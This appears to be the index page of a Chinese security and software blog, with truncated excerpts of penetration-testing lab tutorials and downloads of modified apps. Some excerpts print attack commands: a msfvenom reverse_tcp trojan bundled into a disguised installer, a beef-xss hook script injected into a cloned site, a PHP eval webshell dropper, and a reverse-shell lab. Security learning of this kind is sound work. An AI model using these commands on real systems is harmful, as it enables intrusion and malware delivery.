• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧
  • 本站旗下导航网正式启用
  • 行云博客在线网页制作系统
  • 网课搜题助手
  • 基于支付宝当面付的赞助源码
  • 博客建立路程
  • HTML作品——家乡旅游网站
本站旗下导航网正式启用行云博客在线网页制作系统网课搜题助手基于支付宝当面付的赞助源码博客建立路程HTML作品——家乡旅游网站

手机抓包 HttpCanary v3.3.6

软件介绍HttpCanary,手机抓包大师,最强Android抓包工具。无需ROOT权限,安卓专业强大的HTTP协议抓包和分析工具,支持对HTTP1.0/1.1/2/HTTPS/WebSocket/TLS/SSL等网络协议抓取和注入,支持静态注入和动态注入模式,对抓包内容请求参数,修改请求参数、请求头、请求体、响应码、响应头和响应体等数据。软件截图……

OWASP TOP 10

OWASP Top 10OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。A1 注入injection……

3天教你一招渗透江湖绝学

教程介绍从漏洞中学习代码,在代码中寻找漏洞,本课程教你学会主流的安全渗透实战技能,让学习网络安全成为一件简单的事!……

网易web安全工程师进阶版

教程介绍《Web安全工程师(进阶)》是由“ i春秋学院联合网易安全部”出品,资深讲师团队通过精炼的教学内容、丰富的实际场景及综合项目实战,帮助学员纵向提升技能,横向拓宽视野,牢靠掌握Web安全工程师核心知识,成为安全领域高精尖人才。……

网站克隆:setoolkit社工软件

beef-xss安装beef-xss:1apt install beef-xss安装完成之后运行beef-xss:登录网址:http://192.168.232.138:3000/ui/authentication将beef-xss生成的js代码,放入网站中<script src="http://192.……

msf工具之木马程序制作以及伪装

捆绑木马使用msfvenom制作木马程序:#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe将木马文件放入靶机中……

Github文件在线加速下载

众所周知,GitHub是一个巨大的开源宝库,以及程序员和编程爱好者的聚集地,诸多优秀的开源项目全部都是位于GitHub上。但是每当我们看到优秀的开源项目,准备去下(bai)载(piao)时,会发现速度异常之慢!就我个人而言,在我家里200M电信宽带的环境下,就没发现速度大于过20KB/S的时候,这简直太难受了。今天分享一批提供在线加速下载的网站!ht……

PHP反序列化漏洞原理及示例

PHP反序列化序列化与反序列化序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对不同属性的变量进行不同方式的变化public的属性在序列化时,直接显示属性名protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3private的属性在序列化时,会在属性名前增加0x00classna……

未授权访问漏洞原理及复现

未授权访问前提知识ssh免密登录客户端进入.ssh文件1cd .ssh/生成公私钥1ssh-keygen -t rsa上传公钥到服务端 1ssh-copy-id user@ip更改.ssh目录跟私钥的权限1chmod 700 .ssh/1chmod 600 .ssh/id_rsa服务端……

XXE实体注入漏洞详解

什么是XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。原理既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML……

WinHex v20.0 绿色单文件版

软件介绍X-Ways WinHex,全球知名的计算机取证及数据恢复软件,十六进制编辑器和磁盘编辑器。这款专业十六进制编辑器,用于取证搜集、数据恢复、文件分析和编辑、底层数据处理和安全领域收集文件报告。使用它可以检查修复各种文件、硬盘及内存卡等损坏造成的数据丢失等问题,编辑修改Hex与ASCII编码,多文件搜索与替换,磁盘扇区 (支持FAT16、FAT32和……

任意文件包含漏洞的绕过方式

前期准备file.php代码<?php $a = $_GET['a']; include($a.'.html'); ?>hack.php代码<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?>')……

任意文件包含漏洞原理解析及演示

原理文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行……

中间件的解析漏洞详解及演示

解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。类型:IIS 5.x/6.0解析漏洞IIS 7.0/IIS 7.5/Nginx <0.8.3畸形解析漏洞Nginx <8.03 空字节代码执行漏洞Apache……

2020年web安全渗透测试课

教程介绍大家都知道程序是由代码组成,程序员就是代码的发明者,大家看不懂的代码对于他们来说却像是亲切的孩子,所有的代码在他们手下栩栩如生,但是不是所有的程序员都能够把自己孩子安排妥当,有时候会出现一些错误,但是他们发现不了。虽然网络安全已被高度重视,一些意外情况发生也会令人措手不及,正所谓常在河边走,哪有不湿鞋?一些意外发生之后的应对措施,如果采取的好……

基于JavaScript的rce反弹shell漏洞

环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下1git clone https://github.com/CroweCybers……

永恒之蓝漏洞原理及利用

摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过……

RCE(远程命令/代码执行漏洞)原理及复现

作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后……

SSRF服务端请求伪造——原理及绕过姿势

原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的……

CSRF跨站请求伪造——原理及复现

原理CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当……

爬虫基础

爬虫基础1.HTTP基本原理URI和URLURI: 统一资源标志符URL: 统一资源定位符HTTP和HTTPS HTTP: 超文本传输协议,用于从网络传输超文本数据到本地浏览器的传输协议,它能够保证高效准确的传输文本文档HTTPS: 以安全为目标的HTTP通道,简单来讲是HTTP的安全版,即HTTP下加入SSL,所简称为HTTPSHTTPS的……

老牌压缩软件 7-Zip v20.02

软件介绍7-Zip – 流行的免费开源压缩软件。7-Zip是一款老牌拥有极高压缩算法的免费开源压缩文件管理器,提供命令行接口和图形界面操作,支持独立的7z格式及近乎所有压缩格式,包括ZIP, RAR, ISO, CAB, GZIP, BZIP2, TAR等。其多线程LZMA压缩比要比普通ZIP文件高达30-50%,它可以把ZIP格式的文件再压缩2-10%。……

看图神器ImageGlass v7.6.4.30

软件介绍ImageGlass是一款Windows下的开源轻量级看图工具,包含基本的看图功能以及一个现代化界面。支持包括SVG、HEIC、WebP和RAW在内的70多种图片格式。尤其是Win10自带的图片软件无法支持HEIC格式,导致苹果手机传过来的图片无法打开。软件截图……

文件搜索Everything v1.4.1.986

软件介绍Everything是一款小巧免费速度最快的文件搜索工具,其速度之快令人震惊,百G硬盘几十万个文件,可以在几秒钟之内完成NTFS索引;文件名称搜索瞬间呈现结果,关键词高亮。索引数据库,实时重建变化,轻松分享文件索引,支持文件名称通配符、正则表达式刷选,可以通过HTTP或FTP服务器搜索结果。软件截图……

手机硬件检测工具 AIDA64

软件介绍AIDA64是最权威安卓设备硬件检测利器。它是其它硬件性能检测App难以与之相比的,无论是设备型号、系统版本信息,还是CPU、显示屏和GPU的详细信息,连CPU缓存、GPU ALU、传感器工作状态、网络信息和电池信息、Java虚拟机配置乃至系统System目录各关键文件的详细内容,都能专业读取。软件截图版本特点解锁内购,移除应用广告;……

安卓CPU-Z v1.35去广告版

软件介绍CPU-Z是PC领域家喻户晓的CPU检测神器!Android版CPU-Z与电脑上的PC版本不同,它不仅提供了CPU芯片的信息,还提供了丰富的图形、系统、电池、传感器等信息,可以显示出处理器的型号、主频、内核架构、工艺制程,CPU的负荷情况、屏幕分辨率、RAM内存以及内存负荷情况,让你的手机信息更透明化!软件截图版本特点解锁内购,移除应用……

安卓计算管家v4.2专业版

软件介绍计算管家,又名:人工智能计算器(IdeaCalc),号称最好用的移动计算软件!计算管家,功能非常强大,自带多套纯色主题主题,支持真人语音拨报结果;支持多点触控、支持运算式、支持函数计算、支持单位转换和即时汇率换算。最人性化的触摸设计,最完美的触控体验;独创的文字编辑,快速备注不会忘;千分符、万分符,分隔数字看得清了财务算账不用愁,求和统计解您愁;报……

PHP正则表达式

正则表达式1、正则表达式中包含三种元素分别为:量词、元字符、修饰符2、前导字符串:就是符号前面的一个字符或字符串量词 说明+ 匹配任何至少包含一个前导字符串* 匹配任何包含零个或多个前导字符串? 匹配任何包含零个或1个前导字符串. 匹配任意一个字符串{x} 匹配任何包含x个前导字符串{x,y} 匹配任何包含 x 到 y 个前导字符串{……

安全牛带你入门PHP代码审计

教程介绍为什么选择PHP学习代码审计?PHP是天生用来开发web程序的,正如之前的梗”PHP是世界上最好的语言”,最主要的原因是PHP编写的各种程序随处可见。……

安卓ES文件浏览器v4.2.2.8.0

软件介绍ES文件浏览器(ES File Explorer File Manager)号称安卓第一文件管理器,全球下载次数超过3亿次。它是功能强大本地和网络文件管理器,想更方便的管理你的手机、平板、电脑和网盘?点击就能播放音乐,点击就能播放视频、查看图片、阅读文档、安装应用、查看压缩、进行搜索、还有海量网盘空间存放数据。软件截图版本特点by d……